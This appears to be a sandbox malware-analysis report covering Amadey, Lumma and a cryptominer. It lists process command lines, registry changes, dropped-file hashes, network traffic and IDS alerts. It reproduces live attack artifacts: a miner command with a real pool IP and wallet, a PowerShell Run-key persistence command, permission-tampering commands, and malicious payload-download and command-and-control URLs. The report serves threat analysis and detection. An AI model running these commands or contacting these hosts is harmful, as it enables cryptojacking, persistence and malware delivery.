conhost.exe no specs ping.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs #GENERIC mdwgv6i.exe findstr.exe no specs findstr.exe no specs jfdgqdus.exe cmd.exe no specs cmd.exe no specs csc.exe roster.com no specs dragon.com no specs cvtres.exe no specs choice.exe no specs choice.exe no specs cmd.exe no specs conhost.exe no specs takeown.exe no specs jfdgqdus.exe cmd.exe no specs conhost.exe no specs icacls.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs modsolar.exe modsolar.exe b8f5ac3d6b.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs clientsetup1.exe no specs cmd.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs cmd.exe no specs conhost.exe no specs clientsetup1.exe chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs msiexec.exe chrome.exe no specs powershell.exe no specs 0e97625191.exe chrome.exe no specs conhost.exe no specs #LUMMA 65fc8f9c29.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs #MINER cmd.exe csc.exe chcp.com no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs msiexec.exe no specs cvtres.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs svchost.exe no specs chrome.exe no specs conhost.exe no specs ripplesha.exe cmd.exe no specs csc.exe powershell.exe no specs conhost.exe no specs ce14e4658f.exe no specs csc.exe cvtres.exe no specs csc.exe msiexec.exe no specs cmd.exe no specs cvtres.exe no specs csc.exe conhost.exe no specs cvtres.exe no specs rundll32.exe csc.exe cvtres.exe no specs ramez.exe no specs saren.exe no specs cmd.exe no specs cvtres.exe no specs 6b183db5d8.exe no specs conhost.exe no specs csc.exe conhost.exe no specs vssvc.exe no specs powershell.exe no specs cvtres.exe no specs 4fgxo13f0s97jd12xpb.exe no specs csc.exe csc.exe csc.exe conhost.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs cvtres.exe no specs tcpvcon.exe no specs werfault.exe no specs cvtres.exe no specs #LUMMA msbuild.exe cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs chcp.com no specs win-v41.exe no specs werfault.exe no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs nircmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208cmd /C "ping localhost -n 1 && start C:\Users\admin\AppData\Local\Task_Manager.exe"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA11F.tmp" "c:\Users\admin\AppData\Local\Temp\CSC75F744869524D04A0B0B624B163206.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
632"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\cunnavs4.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
632cmd.exe /C icacls "%SystemRoot%\System32\reagentc.exe" /grant Administrators:FC:\Windows\System32\cmd.exeWinTemp-v4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
644"C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe"C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\d610cf342e\ramez.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
720C:\Windows\System32\cmd.exe --algo rx/0 --url 79.110.49.240:3333 --user 439RTMrajyhLb4cLK4YDejMx4rp8b5VDR4YX4auqWGbgUBj1c4wVbvc69bVUmJuJ8rXWwCU7LAGL9MkFaMwDwXjo6FrM5Y3/x -p x -k --cpu-max-threads-hint=20C:\Windows\System32\cmd.exe
WinTemp-v4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
744"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'mDwGV6i';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'mDwGV6i' -Value '"C:\Users\admin\AppData\Roaming\mDwGV6i.exe"' -PropertyType 'String'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemDwGV6i.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
896"C:\Users\admin\AppData\Local\Temp\10244010101\6b183db5d8.exe" C:\Users\admin\AppData\Local\Temp\10244010101\6b183db5d8.exeramez.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\10244010101\6b183db5d8.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
904"C:\Users\admin\AppData\Local\Temp\10004570101\JFDGQDUS.exe" C:\Users\admin\AppData\Local\Temp\10004570101\JFDGQDUS.exe
saren.exe
User:
admin
Company:
Targe
Integrity Level:
MEDIUM
Description:
Urinary
Exit code:
0
Version:
5.10.7.0
Modules
Images
c:\users\admin\appdata\local\temp\10004570101\jfdgqdus.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
924powercfg /change monitor-timeout-dc 0C:\Windows\System32\powercfg.exeWinTemp-v4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
Total events
242 105
Read events
241 793
Write events
234
Delete events
78

Modification events

(PID) Process:(7636) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7636) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7636) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2504) release_file.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msc\OpenWithProgids
Operation:writeName:MSCFile
Value:
(PID) Process:(2140) e03a5affac.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2140) e03a5affac.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2140) e03a5affac.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1280) 8f2lGlV.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1280) 8f2lGlV.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1280) 8f2lGlV.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
182
Suspicious files
152
Text files
277
Unknown types
47

Dropped files

PID
Process
Filename
Type
7376random.exeC:\Windows\Tasks\ramez.jobbinary
MD5:1486EA40094B06A0B48BD1CDDBFA4BAD
SHA256:EFD8091D69C9EA83ECB7C1A1D6940173EDAD1D9262049F910809EE780E771157
7376random.exeC:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exeexecutable
MD5:1112C0D91931C86989DAB2C7B64464B1
SHA256:9EBFB0ED3D31F3F3340C4B121AAA4B9B32451CA46807965F25310361666F9B7B
8180cmd.exeC:\Users\admin\Downloads\5VUNsb2.exeexecutable
MD5:6F8E1E7D4037E2247BA23999366004FB
SHA256:10143EB25512C7F82D86AB55B193558CD39CA8D5104574AE02091DC252C9B4DC
81605VUNsb2.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service.vbstext
MD5:0D3A5B336939361723EBE01108C7817A
SHA256:3A1EBED2E8458686DC25F8BFE8C0FEDA5E24B401A52F8D6216BF6109104157AA
3240release_file.exeC:\Windows\System32\IntelGraphicsDriver.sysexecutable
MD5:76A372DABEEF43EF22D6BE0AE511AE11
SHA256:ADADA06221C89480A79EA8F68CD7DA4016145EED1773AC41C3DB17C7B6464029
7636ramez.exeC:\Users\admin\AppData\Local\Temp\10243840101\e03a5affac.exeexecutable
MD5:341585069E392EE5512C62DFCC0890E4
SHA256:39078678484F188694E6E3ADA229FE4EBAA622BF89C82C1FA25E958648985B96
7636ramez.exeC:\Users\admin\AppData\Local\Temp\10243860101\5VUNsb2.exeexecutable
MD5:6F8E1E7D4037E2247BA23999366004FB
SHA256:10143EB25512C7F82D86AB55B193558CD39CA8D5104574AE02091DC252C9B4DC
7636ramez.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\release_file[1].exeexecutable
MD5:EDC85FCBD8F79E61687081AD99C9DB93
SHA256:41B1D1CD846AD2D038C7FF9F062AADAA2036E3C2202B7A57DCE45B2A9E2FECEE
4608dllhost.exeC:\Windows\System32\wbem\ATL.dllexecutable
MD5:4087CDAFA45C670DEFD3F1EA24DC612F
SHA256:E96122AB85672B31F02A74D08C62028C1D7DD97F764FB6F6CF0442F6D2FB28CA
2140e03a5affac.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:9CE8A553A9471F6F388C005962D02918
SHA256:7FEA67317E4E65A4310E5A187A0BF23C336C219675E3E111039BD329A68F4F7A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
89
TCP/UDP connections
3 769
DNS requests
80
Threats
187

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.32.238.107:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7636
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
unknown
7636
ramez.exe
GET
200
185.156.72.2:80
http://185.156.72.2/defkiller/release_file.exe
unknown
malicious
7636
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
unknown
2140
e03a5affac.exe
GET
200
142.250.185.99:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
2140
e03a5affac.exe
GET
200
142.250.185.99:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
2140
e03a5affac.exe
GET
200
142.250.185.67:80
http://o.pki.goog/we2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTuMJxAT2trYla0jia%2F5EUSmLrk3QQUdb7Ed66J9kQ3fc%2BxaB8dGuvcNFkCEQDtlZ1CqouxeBLS6KxwEWFx
unknown
whitelisted
7636
ramez.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/7200390261/8f2lGlV.exe
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
23.32.238.107:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.16.253.202:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7636
ramez.exe
185.156.72.96:80
Tov Vaiz Partner
RU
unknown
6544
svchost.exe
20.190.160.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7636
ramez.exe
185.156.72.2:80
Tov Vaiz Partner
RU
malicious

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.32.238.107
  • 23.32.238.112
whitelisted
www.microsoft.com
  • 2.16.253.202
  • 2.23.246.101
whitelisted
google.com
  • 142.250.181.238
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.2
  • 20.190.160.66
  • 20.190.160.17
  • 40.126.32.136
  • 40.126.32.74
  • 40.126.32.72
  • 20.190.160.5
  • 20.190.160.64
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
a2.blogcryptonews.net
  • 91.92.46.179
unknown
drive.usercontent.google.com
  • 142.250.184.193
whitelisted
c.pki.goog
  • 142.250.185.99
whitelisted

Threats

PID
Process
Class
Message
7636
ramez.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 35
7636
ramez.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
7636
ramez.exe
Malware Command and Control Activity Detected
ET MALWARE Amadey CnC Response
7636
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7636
ramez.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 35
7636
ramez.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
7636
ramez.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7636
ramez.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
8160
5VUNsb2.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 13
7636
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info